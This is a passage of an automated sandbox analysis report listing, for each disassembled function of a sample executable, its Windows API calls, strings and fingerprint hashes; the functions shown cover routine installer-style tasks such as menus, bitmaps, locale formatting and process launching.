                                                                                                                                                                        • Part of subcall function 004085A4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087A6,?,?,?,00000000,00408958), ref: 004085B7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoLocale$DefaultSystem
                                                                                                                                                                      • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                                                                                      • API String ID: 1044490935-665933166
                                                                                                                                                                      • Opcode ID: e4d4874023cbce5b0e58a93798fb9a357b254c43991a542c79008375c0b91d34
                                                                                                                                                                      • Instruction ID: acf8fabd4b29bc0114a799655761a3ccdfd58ddc6ec536e3fe46e21ad76a8ffd
                                                                                                                                                                      • Opcode Fuzzy Hash: e4d4874023cbce5b0e58a93798fb9a357b254c43991a542c79008375c0b91d34
                                                                                                                                                                      • Instruction Fuzzy Hash: 85515C24B001486BDB00FBA99E91A9E77A9DB84308F50C47FA151BB3C7CE3CDA05975D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004116EC Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetVersion.KERNEL32(00000000,004118F1), ref: 00411784
                                                                                                                                                                      • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 00411842
                                                                                                                                                                        • Part of subcall function 00411AA4: CreatePopupMenu.USER32 ref: 00411ABE
                                                                                                                                                                      • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118CE
                                                                                                                                                                        • Part of subcall function 00411AA4: CreateMenu.USER32 ref: 00411AC8
                                                                                                                                                                      • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118B5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                                                                                                      • String ID: ,$?
                                                                                                                                                                      • API String ID: 2359071979-2308483597
                                                                                                                                                                      • Opcode ID: e0c9a44165d56187b0795cac699610ea385af12d5fd7003569757b390febdefd
                                                                                                                                                                      • Instruction ID: d8c93b49542c4992b593f331124e59532eba8c65ca5fe63237d6ba0ca55a8ecc
                                                                                                                                                                      • Opcode Fuzzy Hash: e0c9a44165d56187b0795cac699610ea385af12d5fd7003569757b390febdefd
                                                                                                                                                                      • Instruction Fuzzy Hash: 9E510370A00245ABDB10EF6ADD816EA7BF9AF09304B15857BF904E73A2D738DD41CB58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00454FE4 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00455200,00455200,?,00455200,00000000), ref: 0045518E
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00455200,00455200,?,00455200), ref: 0045519B
                                                                                                                                                                        • Part of subcall function 00454F50: WaitForInputIdle.USER32(?,00000032), ref: 00454F7C
                                                                                                                                                                        • Part of subcall function 00454F50: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454F9E
                                                                                                                                                                        • Part of subcall function 00454F50: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FAD
                                                                                                                                                                        • Part of subcall function 00454F50: CloseHandle.KERNEL32(?,00454FDA,00454FD3,?,?,?,00000000,?,?,004551AF,?,?,?,00000044,00000000,00000000), ref: 00454FCD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                                                                                                      • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                                                                                                      • API String ID: 854858120-615399546
                                                                                                                                                                      • Opcode ID: 2dc3338e08050e760c42e1356170235b3cb66a2421c1a7f36539363043d19dfd
                                                                                                                                                                      • Instruction ID: 453c4c1e4331516b603b6bd36f4112f8bfb414d7ddeab97af99533fe31520792
                                                                                                                                                                      • Opcode Fuzzy Hash: 2dc3338e08050e760c42e1356170235b3cb66a2421c1a7f36539363043d19dfd
                                                                                                                                                                      • Instruction Fuzzy Hash: 7A516C34B0074D6BDB11EF95C852BEEBBB9AF44305F50407BB804B7293D7789A098B59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0041BE5B Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetObjectA.GDI32(?,00000018,?), ref: 0041BF20
                                                                                                                                                                      • GetObjectA.GDI32(?,00000018,?), ref: 0041BF2F
                                                                                                                                                                      • GetBitmapBits.GDI32(?,?,?), ref: 0041BF80
                                                                                                                                                                      • GetBitmapBits.GDI32(?,?,?), ref: 0041BF8E
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0041BF97
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0041BFA0
                                                                                                                                                                      • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFBD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1030595962-0
                                                                                                                                                                      • Opcode ID: a6b868a807f1f599719e52264ea8325182c659afeabb6b194134e5b91d426331
                                                                                                                                                                      • Instruction ID: 4619fcafd17693633a8c31a92518bd0abdf88944d34ea3f3446ff31194e2e661
                                                                                                                                                                      • Opcode Fuzzy Hash: a6b868a807f1f599719e52264ea8325182c659afeabb6b194134e5b91d426331
                                                                                                                                                                      • Instruction Fuzzy Hash: 48510375A00219AFCF10DFA9C8819EEB7F9EF48314B11856AF914E7391D738AD81CB64
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0041CED0 Relevance: 10.7, APIs: 7, Instructions: 152windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEF6
                                                                                                                                                                      • 74074720.GDI32(00000000,00000026), ref: 0041CF15
                                                                                                                                                                      • 74068900.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF7B
                                                                                                                                                                      • 74062350.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CF8A
                                                                                                                                                                      • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFF4
                                                                                                                                                                      • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D032
                                                                                                                                                                      • 74068900.GDI32(?,?,00000001,0041D064,00000000,00000026), ref: 0041D057
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Stretch$74068900$7406235074074720BitsMode
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2217125363-0
                                                                                                                                                                      • Opcode ID: c81279b313576d135e7f058ec71da99c22708ae42f226878f0d4e896de0476ba
                                                                                                                                                                      • Instruction ID: 9b717f45caa71cbdb3d7743a5068819f31981c945c02765ea0762fde20f1409d
                                                                                                                                                                      • Opcode Fuzzy Hash: c81279b313576d135e7f058ec71da99c22708ae42f226878f0d4e896de0476ba
                                                                                                                                                                      • Instruction Fuzzy Hash: 17513F70604204AFDB14DFA8C985F9BBBF9EF08304F14459AB545E7692C778ED81CB58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004570FC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageA.USER32(00000000,?,?), ref: 0045714E
                                                                                                                                                                        • Part of subcall function 00424274: GetWindowTextA.USER32(?,?,00000100), ref: 00424294
                                                                                                                                                                        • Part of subcall function 0041EE9C: GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                                                                                                                                        • Part of subcall function 0041EE9C: 74075A40.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                                                                                                                                        • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004571B5
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 004571D3
                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 004571DC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$TextWindow$74075CurrentDispatchSendThreadTranslate
                                                                                                                                                                      • String ID: [Paused]
                                                                                                                                                                      • API String ID: 1916919826-4230553315
                                                                                                                                                                      • Opcode ID: 672503b6a96877f30574edfb6037b36d51d6f9bd63dc11b01ce968f60d2979fd
                                                                                                                                                                      • Instruction ID: 4dd0f6a69861fba71970a0c95394483262e0630457e8f7cd4854214566cc162d
                                                                                                                                                                      • Opcode Fuzzy Hash: 672503b6a96877f30574edfb6037b36d51d6f9bd63dc11b01ce968f60d2979fd
                                                                                                                                                                      • Instruction Fuzzy Hash: EC3196319082449EDB11DFB5EC81B9E7FB8EB49314F5544BBF800E7292D63C9909CB69
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0046B240 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99sleepCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCursor.USER32(00000000,0046B37F), ref: 0046B2FC
                                                                                                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 0046B30A
                                                                                                                                                                      • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B310
                                                                                                                                                                      • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B31A
                                                                                                                                                                      • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B320
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Cursor$LoadSleep
                                                                                                                                                                      • String ID: CheckPassword
                                                                                                                                                                      • API String ID: 4023313301-1302249611
                                                                                                                                                                      • Opcode ID: 57fde8d3f6b7d15b0ed7a9d0ac2b39607940856d20305a0d83c28e2381b76bc0
                                                                                                                                                                      • Instruction ID: dcef8ef75e700f151948083f515970cfb06be99f29bdf3d7051495a11b4a934f
                                                                                                                                                                      • Opcode Fuzzy Hash: 57fde8d3f6b7d15b0ed7a9d0ac2b39607940856d20305a0d83c28e2381b76bc0
                                                                                                                                                                      • Instruction Fuzzy Hash: 9D3190347402049FD701EF69C899B9E7BE4EB49304F5580B6B904DB3A2E7789E80CB89
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00477700 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00477628: GetWindowThreadProcessId.USER32(00000000), ref: 00477630
                                                                                                                                                                        • Part of subcall function 00477628: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477727,0049C0A4,00000000), ref: 00477643
                                                                                                                                                                        • Part of subcall function 00477628: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477649
                                                                                                                                                                      • SendMessageA.USER32(00000000,0000004A,00000000,00477ABA), ref: 00477735
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0047777A
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00477784
                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 004777D9
                                                                                                                                                                      Strings
                                                                                                                                                                      • CallSpawnServer: Unexpected response: $%x, xrefs: 0047776A
                                                                                                                                                                      • CallSpawnServer: Unexpected status: %d, xrefs: 004777C2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                                                                                                      • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                                                                                                      • API String ID: 613034392-3771334282
                                                                                                                                                                      • Opcode ID: e1b07b7da0dc81f79c626057223c48b53da9c8a9430d466ab72b2e6b955821c4
                                                                                                                                                                      • Instruction ID: 5facb6da61392f64ef9a6a7cc904dffa3fea64199446eda4e4b81d1598b422a3
                                                                                                                                                                      • Opcode Fuzzy Hash: e1b07b7da0dc81f79c626057223c48b53da9c8a9430d466ab72b2e6b955821c4
                                                                                                                                                                      • Instruction Fuzzy Hash: 0131E474F042158ADF10EBB9C8467EEB6A09B08304F90807AB508EB382D67C5E01C79D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004595A4 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045965F
                                                                                                                                                                      Strings
                                                                                                                                                                      • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045966A
                                                                                                                                                                      • CreateAssemblyCache, xrefs: 00459656
                                                                                                                                                                      • Fusion.dll, xrefs: 004595FF
                                                                                                                                                                      • .NET Framework CreateAssemblyCache function failed, xrefs: 00459682
                                                                                                                                                                      • Failed to load .NET Framework DLL "%s", xrefs: 00459644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc
                                                                                                                                                                      • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                                                                                                      • API String ID: 190572456-3990135632
                                                                                                                                                                      • Opcode ID: 33af4aaa21264c81c53814040dfae68ab1999295512c5fd57f60b9e46a5a0a7d
                                                                                                                                                                      • Instruction ID: ee3dd963a50cff277cc460556b086b348bcce4d3c12070cda944c03b6b96f9ce
                                                                                                                                                                      • Opcode Fuzzy Hash: 33af4aaa21264c81c53814040dfae68ab1999295512c5fd57f60b9e46a5a0a7d
                                                                                                                                                                      • Instruction Fuzzy Hash: 5D315771E00609EBCB01EFA5C88169EB7A5AF44315F50857BE814A7382DB7C9E09CB99
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0041C140 Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0041C040: GetObjectA.GDI32(?,00000018), ref: 0041C04D
                                                                                                                                                                      • GetFocus.USER32 ref: 0041C160
                                                                                                                                                                      • 7406A670.USER32(?), ref: 0041C16C
                                                                                                                                                                      • 74068900.GDI32(?,?,00000000,00000000,0041C1EB,?,?), ref: 0041C18D
                                                                                                                                                                      • 74062350.GDI32(?,?,?,00000000,00000000,0041C1EB,?,?), ref: 0041C199
                                                                                                                                                                      • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B0
                                                                                                                                                                      • 74068900.GDI32(?,00000000,00000000,0041C1F2,?,?), ref: 0041C1D8
                                                                                                                                                                      • 7406A580.USER32(?,?,0041C1F2,?,?), ref: 0041C1E5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 740674068900$74062350A580A670BitsFocusObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1711558056-0
                                                                                                                                                                      • Opcode ID: 9c9984a03792254f7cf3ad1787892f213a144d0a64db434cb782e1e94da2dcd6
                                                                                                                                                                      • Instruction ID: 42301c90dcb8571f5cbc3500225c3f0eaf81cc24073f805a24a28427ce123417
                                                                                                                                                                      • Opcode Fuzzy Hash: 9c9984a03792254f7cf3ad1787892f213a144d0a64db434cb782e1e94da2dcd6
                                                                                                                                                                      • Instruction Fuzzy Hash: D7116D71A44618BBDF00DBE9CC81FAFB7FCEB48700F14446AB518E7281DA3899008B28
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00418C4C Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemMetrics.USER32(0000000E), ref: 00418C68
                                                                                                                                                                      • GetSystemMetrics.USER32(0000000D), ref: 00418C70
                                                                                                                                                                      • 70292980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C76
                                                                                                                                                                        • Part of subcall function 004099A8: 7028C400.COMCTL32(0049B628,000000FF,00000000,00418CA4,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099AC
                                                                                                                                                                      • 702FCB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CC6
                                                                                                                                                                      • 702FC740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD1
                                                                                                                                                                      • 702FCB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000), ref: 00418CE4
                                                                                                                                                                      • 70290860.COMCTL32(0049B628,00418D07,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E), ref: 00418CFA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MetricsSystem$70287029086070292980C400C740
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1719614493-0
                                                                                                                                                                      • Opcode ID: 3e87c7a23a4a947163f4d2b90e583babc0fab05060521c53009111721e1cf9e6
                                                                                                                                                                      • Instruction ID: c5403bac5749a6cea20ad86aefc03aeb17a2f2ee6000d3a37742d6553dc7a201
                                                                                                                                                                      • Opcode Fuzzy Hash: 3e87c7a23a4a947163f4d2b90e583babc0fab05060521c53009111721e1cf9e6
                                                                                                                                                                      • Instruction Fuzzy Hash: 981124B1B44304BFDB10EBA9EC82F5E73B8DB48714F50406AB504EB2C2DAB99D408659
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00483228 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
